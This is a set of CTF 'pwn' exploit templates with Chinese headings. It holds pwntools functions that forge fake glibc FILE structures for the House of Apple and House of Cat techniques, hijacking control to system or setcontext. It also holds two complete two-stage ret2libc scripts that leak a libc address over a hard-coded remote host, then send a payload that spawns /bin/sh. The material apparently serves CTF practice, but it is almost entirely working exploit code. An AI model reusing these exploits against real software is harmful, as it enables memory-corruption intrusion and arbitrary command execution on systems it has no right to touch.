板子

常见题型模板

高版本打IO

能exit的——House of Apple

def MakeFakeFILE(libcBase_,libc_,wide_data_,wide_data_vtable_):
    """Return a forged ``_IO_FILE_plus`` for the House of Apple (exit-path) template.

    Two supporting structures are written first through the project helper
    ``Edit`` (defined elsewhere; called here as ``Edit(index, data)`` and
    presumably overwriting the chunk at ``index``), then the FILE itself is
    built with pwntools ``FileStructure`` and serialized.

    Args:
        libcBase_: libc load base; added to every ``libc_.symbols`` offset.
        libc_: pwntools ``ELF`` of the target libc (only ``.symbols`` is read).
        wide_data_: address of the forged ``_IO_wide_data`` (the chunk-4 write).
        wide_data_vtable_: address of the forged wide vtable (the chunk-5 write).

    Returns:
        ``bytes(FileStructure)`` — the serialized fake FILE.

    NOTE(review): every offset below is glibc-layout specific (the author's
    own remarks give 0x130 vs 0xe0 for the wide_data vtable slot). The two
    ``Edit(4, ...)`` calls are alternative layouts written to the same chunk,
    so the second presumably overwrites the first — confirm which one the
    target glibc needs.
    """
    # Forge the vtable: the slot at +0x68 is the hijacked doallocate entry,
    # now pointing at system.
    Edit(5,b'\x00'*0x68+p64(libcBase_+libc_.symbols["system"])+b'\x00'*0x38)
    # Forge _IO_wide_data: the slot at +0xe0 holds the vtable forged above.
    Edit(4,b'\x00'*0x18+p64(0)+b'\x00'*0x10+p64(0)+b'\x00'*0xf8+p64(wide_data_vtable_)) # also works on older glibc (2.2x), but there _IO_wide_data is 0x138 bytes and the vtable slot is at +0x130
    Edit(4,b'\x00'*0x18+p64(0)+b'\x00'*0x10+p64(0)+b'\x00'*0xa8+p64(wide_data_vtable_)) # newer-glibc layout: only the struct size differs, vtable slot at +0xe0

    # Forge the FILE itself.
    IO_FILE_plus=FileStructure()
    IO_FILE_plus.flags=0x68732020 # bytes read as " sh" (the argument); also keeps flags & 0x800 == 0 so the check passes
    IO_FILE_plus._IO_write_ptr=1
    IO_FILE_plus._wide_data=wide_data_
    IO_FILE_plus.vtable=libcBase_+libc_.symbols["_IO_file_jumps"]-0x540 # redirect to _IO_wfile_jumps
    return bytes(IO_FILE_plus)

不能exit的——House of Cat打xsputn

如果开了沙箱——劫持到setcontext打orw

def MakeFakeFILE(libcBase_,libc_,wide_data_,wide_vtable_,sigFrameAddr_):
    """Return a forged ``_IO_FILE_plus`` for the House of Cat (xsputn) template, sandboxed variant.

    The forged wide vtable holds ``setcontext+61`` instead of ``system``, so
    control transfers to a prepared signal frame at ``sigFrameAddr_``.
    Supporting structures are written through the project helper ``Edit``,
    called here as ``Edit(index, size, data)`` (defined elsewhere; this is a
    three-argument form, unlike the two-argument ``Edit`` used by the House
    of Apple template on this page).

    Args:
        libcBase_: libc load base; added to every ``libc_.symbols`` offset.
        libc_: pwntools ``ELF`` of the target libc (only ``.symbols`` is read).
        wide_data_: address of the forged ``_IO_wide_data`` (the chunk-2 write).
        wide_vtable_: address of the forged wide vtable (the chunk-3 write).
        sigFrameAddr_: address of the signal frame consumed by setcontext;
            stored in the wide_data write_ptr slot (+0x20).

    Returns:
        ``bytes(FileStructure)`` — the serialized fake FILE.

    NOTE(review): all offsets are glibc-layout specific; the vtable address
    math (``_IO_file_jumps - 0x540 + 0x10``) is explained only by the trailing
    comment below.
    """
    # Forge the vtable: +0x18 is the overflow slot, now holding setcontext+61.
    Edit(3,168,b'\x00'*0x18+p64(libcBase_+libc_.symbols["setcontext"]+61)+b'\x00'*0x88) # the slot at vtable+0x18 is overflow, replaced by setcontext+61
    # Forge wide_data: its write_ptr field must point at the sigframe.
    Edit(2,232,b'\x00'*0x20+p64(sigFrameAddr_)+b'\x00'*0xb8+p64(wide_vtable_)) # wide_data write_ptr must point at the sigFrame location
    # Forge the FILE itself.
    IO_FILE_plus=FileStructure()
    IO_FILE_plus.flags=0xfbad2222
    IO_FILE_plus._lock=libcBase_+libc_.symbols["_IO_2_1_stdout_"]+0x60 # _lock must be a valid address
    IO_FILE_plus.fileno=1
    IO_FILE_plus._wide_data=wide_data_
    IO_FILE_plus.vtable=libcBase_+libc_.symbols["_IO_file_jumps"]-0x540+0x10 # shifted by 0x10 so the wfile_xsputn slot lands on wfile_seekoff
    return bytes(IO_FILE_plus)

如果没开沙箱——劫持到system

def MakeFakeFILE(libcBase_,libc_,wide_data_,wide_vtable_):
    """Return a forged ``_IO_FILE_plus`` for the House of Cat (xsputn) template, no-sandbox variant.

    Same layout as the sandboxed variant above, but the forged wide vtable
    slot at +0x18 holds ``system`` and the wide_data write_ptr only needs to
    exceed write_base. Supporting structures are written through the project
    helper ``Edit``, called here as ``Edit(index, size, data)`` (defined
    elsewhere).

    Args:
        libcBase_: libc load base; added to every ``libc_.symbols`` offset.
        libc_: pwntools ``ELF`` of the target libc (only ``.symbols`` is read).
        wide_data_: address of the forged ``_IO_wide_data`` (the chunk-2 write).
        wide_vtable_: address of the forged wide vtable (the chunk-3 write).

    Returns:
        ``bytes(FileStructure)`` — the serialized fake FILE.

    NOTE(review): all offsets are glibc-layout specific; this function shares
    its name with two other templates on the page, so only one of them can be
    live in a given script.
    """
    # Forge the vtable: +0x18 is the overflow slot, now holding system.
    Edit(3,168,b'\x00'*0x18+p64(libcBase_+libc_.symbols["system"])+b'\x00'*0x88) # the slot at vtable+0x18 is overflow, replaced by system
    # Forge wide_data: write_ptr (+0x20) must be greater than write_base (+0x18).
    Edit(2,232,b'\x00'*0x20+p64(1)+b'\x00'*0xb8+p64(wide_vtable_)) # wide_data write_ptr (0x20) has to exceed the write_base (0x18) field
    # Forge the FILE itself.
    IO_FILE_plus=FileStructure()
    IO_FILE_plus.flags=0x6873 # little-endian bytes "sh"
    IO_FILE_plus._lock=libcBase_+libc_.symbols["_IO_2_1_stdout_"]+0x60 # _lock must be a valid address
    IO_FILE_plus.fileno=1
    IO_FILE_plus._wide_data=wide_data_
    IO_FILE_plus.vtable=libcBase_+libc_.symbols["_IO_file_jumps"]-0x540+0x10 # shifted by 0x10 so the wfile_xsputn slot lands on wfile_seekoff
    return bytes(IO_FILE_plus)

二阶段ret2libc

给了libc.so的

from pwn import *
# Run-mode selector consumed by Lauch().
LOCAL = 11
REMOTE = 12
DEBUG = 13
mode = REMOTE

# pwntools context: x86-64 Linux, debug-level I/O logging, tmux split for the debugger.
context.terminal = ["tmux", "splitw", "-h"]
context(os="linux", arch="x86_64", log_level="debug")

# Target binary and the libc that was shipped with it.
targetELF = "./pwn"
libcPath = "./libc.so.6"
elf = ELF(targetELF)
libc = ELF(libcPath)

# Addresses resolved from the binary's own tables.
leakFuncName = "__libc_start_main"
leakFuncGOT = elf.got[leakFuncName]   # GOT slot whose contents get printed
printfPLT = elf.plt["puts"]           # despite the name, this is puts@plt
backAddr = elf.symbols["main"]        # re-entry point after the first round

# Binary-specific constants: hand-picked gadgets and the return offset.
retOffset = 0x28                      # 0x20 + 8; presumably buffer plus saved rbp — confirm
pop_rdi_ret = 0x40102f
retAlignPadding = 0x40101a            # presumably a bare `ret` for stack alignment — confirm
def Lauch():
    """Open the I/O tube selected by the module-level ``mode``.

    LOCAL runs ``targetELF`` directly, REMOTE connects to the fixed host/port
    below, DEBUG starts it under gdb with a breakpoint at 0x4012ea. Any other
    value of ``mode`` yields ``None``.
    """
    if mode == LOCAL:
        return process(targetELF)
    if mode == REMOTE:
        return remote("8.147.132.32", 43291)
    if mode == DEBUG:
        return gdb.debug(targetELF, "b *0x4012ea")
    return None

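# Stage 1: print the GOT entry of leakFuncName via puts, then return to main
# so a second payload can be sent.
ioTube = Lauch()

# NOTE(review): the names used here are the ones defined above; the original
# referenced undefined `leakGOT`, `putsPLT` and sent an unassigned `payload`.
payload1 = (
    b'A' * retOffset
    + p64(pop_rdi_ret)
    + p64(leakFuncGOT)
    + p64(printfPLT)
    + p64(backAddr)
)
ioTube.send(payload1)
# ljust pads the truncated line back to 8 bytes so u64 can unpack it.
libcReal = u64(ioTube.recvline(keepends=False).ljust(8, b'\x00'))

# Stage 2: rebase the provided libc and return into system("/bin/sh").
libcBase = libcReal - libc.symbols[leakFuncName]
systemAddr = libcBase + libc.symbols["system"]
binshAddr = libcBase + next(libc.search("/bin/sh"))

payload = (
    b'A' * retOffset
    + p64(retAlignPadding)  # presumably a bare `ret` for stack alignment — confirm
    + p64(pop_rdi_ret)
    + p64(binshAddr)
    + p64(systemAddr)
)
ioTube.send(payload)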

没给libc.so的

from pwn import *
from LibcSearcher import *
# Run-mode selector consumed by Lauch().
LOCAL = 11
REMOTE = 12
DEBUG = 13
mode = REMOTE

# pwntools context: x86-64 Linux, debug-level I/O logging, tmux split for the debugger.
context.terminal = ["tmux", "splitw", "-h"]
context(os="linux", arch="x86_64", log_level="debug")

# Target binary; no libc is shipped, so it is identified later from the leak.
targetELF = "./pwn"
elf = ELF(targetELF)

# Addresses resolved from the binary's own tables.
leakFuncName = "__libc_start_main"
leakFuncGOT = elf.got[leakFuncName]   # GOT slot whose contents get printed
printfPLT = elf.plt["puts"]           # despite the name, this is puts@plt
backAddr = elf.symbols["main"]        # re-entry point after the first round

# Binary-specific constants: hand-picked gadgets and the return offset.
retOffset = 0x28                      # 0x20 + 8; presumably buffer plus saved rbp — confirm
pop_rdi_ret = 0x40102f
retAlignPadding = 0x40101a            # presumably a bare `ret` for stack alignment — confirm
def Lauch():
    """Open the I/O tube selected by the module-level ``mode``.

    LOCAL runs ``targetELF`` directly, REMOTE connects to the fixed host/port
    below, DEBUG starts it under gdb with a breakpoint at 0x4012ea. Any other
    value of ``mode`` yields ``None``.
    """
    if mode == LOCAL:
        return process(targetELF)
    if mode == REMOTE:
        return remote("8.147.132.32", 43291)
    if mode == DEBUG:
        return gdb.debug(targetELF, "b *0x4012ea")
    return None

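# Stage 1: print the GOT entry of leakFuncName via puts, then return to main
# so a second payload can be sent.
ioTube = Lauch()

# NOTE(review): the names used here are the ones defined above; the original
# referenced undefined `leakGOT`, `putsPLT` and sent an unassigned `payload`.
payload1 = (
    b'A' * retOffset
    + p64(pop_rdi_ret)
    + p64(leakFuncGOT)
    + p64(printfPLT)
    + p64(backAddr)
)
ioTube.send(payload1)
# ljust pads the truncated line back to 8 bytes so u64 can unpack it.
libcReal = u64(ioTube.recvline(keepends=False).ljust(8, b'\x00'))

# Stage 2: identify the libc from the leak and rebase it. A LibcSearcher
# object exposes offsets through dump(), not through a .symbols mapping, so
# the base is computed with dump() as well.
libc = LibcSearcher(leakFuncName, libcReal)
libcBase = libcReal - libc.dump(leakFuncName)

systemAddr = libcBase + libc.dump("system")
binshAddr = libcBase + libc.dump("str_bin_sh")

payload = (
    b'A' * retOffset
    + p64(retAlignPadding)  # presumably a bare `ret` for stack alignment — confirm
    + p64(pop_rdi_ret)
    + p64(binshAddr)
    + p64(systemAddr)
)
ioTube.send(payload)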
